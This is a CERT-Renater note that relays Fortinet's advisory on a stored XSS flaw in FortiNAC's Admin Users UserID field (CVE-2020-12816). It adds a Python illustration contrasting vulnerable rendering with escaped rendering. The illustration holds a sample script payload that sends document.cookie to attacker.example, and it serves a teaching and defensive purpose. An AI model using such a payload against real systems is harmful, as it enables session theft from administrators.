
====================================================================

                             CERT-Renater

                 Note d'Information No. 2020/VULN536
_____________________________________________________________________

DATE                : 24/09/2020

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running FortiNAC versions prior to 8.7.3.

=====================================================================
https://fortiguard.com/psirt/FG-IR-20-002
_____________________________________________________________________


XSS vulnerability in the UserID of Admin Users in FortiNAC

IR Number : FG-IR-20-002

Date      : Sep 23, 2020

Risk      : 3/5

Impact    : Unauthorized code execution

CVE ID    : CVE-2020-12816


Summary

An improper neutralization of input vulnerability in FortiNAC may allow
a remote authenticated attacker to perform a stored cross-site scripting
(XSS) attack via the UserID of Admin Users. Because the XSS is stored
rather than reflected, the injected script is saved with the Admin User
record and executes in the browser of any administrator who later views
that record.


Impact

Unauthorized code execution


Affected Products

FortiNAC version 8.7.2 and below.


Solutions

Please upgrade to FortiNAC 8.7.3 or above. Until the upgrade is applied,
restrict access to the FortiNAC administrative interface to trusted
management networks and review existing Admin User records for UserID
values containing HTML or script markup.
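
The following is an added illustration of the bug class described in the
Summary and of the affected range given above; it is not FortiNAC code and
is not taken from the Fortinet advisory. It models an Admin Users page with
a constructed in-memory table and a hypothetical script payload in the
UserID field, renders it once without output encoding (the "improper
neutralization of input" defect) and once with context-appropriate
encoding, and adds a small helper that applies the advisory's affected
range (8.7.2 and below) to a dotted version string. All names, the table
and the payload are assumptions made for this example.

```python
import html
import re
from urllib.parse import quote

# Constructed sample UserID carrying a script. Hypothetical payload for
# illustration only; it is not taken from the advisory.
ATTACKER_USERID = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

# In-memory stand-in for an Admin Users table (constructed, not FortiNAC's).
ADMIN_USERS = {}


def save_admin_user(user_id: str, role: str) -> None:
    """Store the record exactly as submitted. Storing raw input is not the
    defect by itself; the defect is rendering it later without encoding."""
    ADMIN_USERS[user_id] = {"user_id": user_id, "role": role}


def render_admin_list_vulnerable() -> str:
    """Build the Admin Users page by concatenating stored fields into HTML
    with no neutralization. Every administrator who views this page runs
    whatever script was stored in a UserID (stored XSS)."""
    rows = [
        f'<tr><td>{u["user_id"]}</td><td>{u["role"]}</td></tr>'
        for u in ADMIN_USERS.values()
    ]
    return "<table>" + "".join(rows) + "</table>"


def render_admin_list_fixed() -> str:
    """Same page with output encoding chosen per context: html.escape for
    element text and attribute values, percent-encoding for a URL path
    segment. The stored value is unchanged; only the rendering differs."""
    rows = []
    for u in ADMIN_USERS.values():
        text = html.escape(u["user_id"], quote=True)
        path = quote(u["user_id"], safe="")
        role = html.escape(u["role"], quote=True)
        rows.append(
            f'<tr><td><a href="/admin/users/{path}">{text}</a></td>'
            f"<td>{role}</td></tr>"
        )
    return "<table>" + "".join(rows) + "</table>"


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def has_unescaped_script(rendered: str) -> bool:
    """Crude detector used by the demo: is a live <script> tag present in
    the rendered page? (An escaped &lt;script&gt; does not match.)"""
    return _SCRIPT_TAG.search(rendered) is not None


def is_affected_version(version: str) -> bool:
    """Affected per the advisory: FortiNAC 8.7.2 and below; fixed in 8.7.3.
    Handles plain dotted numeric versions only."""
    parts = tuple(int(p) for p in version.split("."))
    return parts < (8, 7, 3)


if __name__ == "__main__":
    save_admin_user(ATTACKER_USERID, "Administrator")
    print("vulnerable page contains live script:",
          has_unescaped_script(render_admin_list_vulnerable()))
    print("fixed page contains live script:",
          has_unescaped_script(render_admin_list_fixed()))
    for v in ("8.6.0", "8.7.2", "8.7.3", "9.1.0"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

The fix is applied at render time, not at storage time: rejecting or
stripping markup on input is a useful defence in depth, but the property
that actually closes the bug is that every stored field is encoded for the
context it is emitted into.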


Acknowledgement

Fortinet is pleased to thank Johnatan Camargo from Itau Unibanco for
reporting this vulnerability under responsible disclosure.


=========================================================
+ CERT-RENATER       |    tel : 01-53-94-20-44          +
+ 23/25 Rue Daviel   |    fax : 01-53-94-20-41          +
+ 75013 Paris        |    email:cert@support.renater.fr +
=========================================================


